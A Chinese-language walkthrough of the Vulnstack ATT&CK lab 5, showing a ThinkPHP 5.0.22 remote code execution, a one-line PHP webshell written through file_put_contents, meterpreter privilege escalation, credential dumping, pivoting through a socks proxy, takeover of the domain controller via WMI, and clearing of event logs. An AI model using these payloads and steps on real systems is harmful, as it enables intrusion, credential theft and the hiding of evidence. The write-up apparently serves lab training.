0x00:前言
ATT&CK第五个攻防靶场虚拟机共用两个,一个外网一个内网,用来练习红队相关内容和方向,主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习。
靶场详情:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/
靶场环境:
攻击机:192.168.1.10
Win7:192.168.1.8 192.168.138.136
Win2008:192.168.138.138
0x01:信息收集
对目标IP进行端口扫描,发现开启了80和3306端口
nmap -Pn -A -T4 192.168.1.8
访问192.168.1.8发现是一个thinkphp站点,对其进行目录扫描
扫描到一个add.php,访问是一个大马,对其进行密码爆破,爆破出密码后,发现大马很多功能都用不了
0x02:漏洞利用
通过报错知道ThinkPHP版本为5.0.22,先进行漏洞验证
http://192.168.1.8/index.php/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
漏洞利用
发现存在漏洞,使用下面的payload直接写入一句话(其实可以直接登录大马,新建一个PHP文件写入一句话)
http://192.168.1.8/index.php/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir 获取网站物理路径
通过system函数写入一句话
http://192.168.1.8/index.php/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "" >C:/phpStudy/PHPTutorial/WWW/public/chan.php
或者用php文件函数file_put_contents直接写入一句话
http://192.168.1.8/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=2.php&vars[1][]=%3C?php%20@eval($_POST[chan]);?%3E
写入成功后,使用蚁剑进行连接,进行主机信息收集,发现该主机在域内,另一个IP为192.168.138.136
使用MSF生一个木马,上传到蚁剑上运行
MSF监听4444端口,成功获取到一个meterpreter
使用getsystem命令提权成功,得到SYSTEM权限
查看主机运行的进程,发现存在域管理员进程
对主机进行密码抓取,成功抓取到域管理员密码
切换到域成员进程进行域名信息搜集,域控为192.168.138.138
0x03:横向渗透
使用MSF自带模块搭建socks代理
先在meterpreter中使用route进行查看当前靶机win7所在网段的信息
使用route增加对应路由
route add 192.168.138.0 255.255.255.0 2 # 2是挂起session的编号
use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
set version 4a
exploit
先进行存活主机探测,发现只有win7和域控win2008
端口服务探测
搭建好代理后,对域控进行端口服务扫描
nmap -sT -sV -Pn -p 21,22,53,80,135,139,445,1433,3306,8080,3389 192.168.138.138
发现开启了445端口,使用MSF的永恒之蓝模块进行攻击,但是失败了
前面我们已经抓取到了域管理员的密码,使用wmicexec远程连接域控(注:使用WMIC连接远程主机,需要目标开启135和445端口。135端口是WMIC默认的管理端口,WMIC使用445端口传回显)成功连接域控主机,获取域控权限。后面如果想要连接远程桌面的话,可以开启3远程桌面服务,开启3389端口,关闭防火墙即可进行远程桌面登录
0x04:日志清理
有远程桌面的权限时手动删除日志:
开始-程序-管理工具-计算机管理-系统工具-事件查看器-清除日志
meterpreter自带清除日志功能
clearev 清除Windows中的应用程序日志,系统日志安全日志
特别声明:以上内容(如有图片或视频亦包括在内)为自媒体平台“网易号”用户上传并发布,本平台仅提供信息存储服务。
Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.
